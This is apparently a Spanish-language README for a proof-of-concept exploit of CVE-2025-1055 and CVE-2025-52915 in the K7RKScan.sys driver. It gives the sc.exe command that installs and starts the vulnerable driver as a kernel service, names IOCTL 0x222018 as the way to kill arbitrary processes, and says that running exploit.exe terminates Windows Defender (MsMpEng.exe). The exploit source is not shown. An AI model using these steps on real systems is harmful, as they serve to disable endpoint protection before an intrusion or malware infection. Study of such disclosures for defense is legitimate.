
PoC para CVE-2025-1055 y CVE-2025-52915 usando K7RKScan.sys
PoC para CVE-2025-1055 y CVE-2025-52915 usando K7RKScan.sys. Este PoC utiliza el IOCTL 0x222018 para terminar procesos arbitrarios.
Instalación del controlador:
sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys
Ejecución del PoC:
exploit.exe
Terminará el proceso MsMpEng.exe (Windows Defender).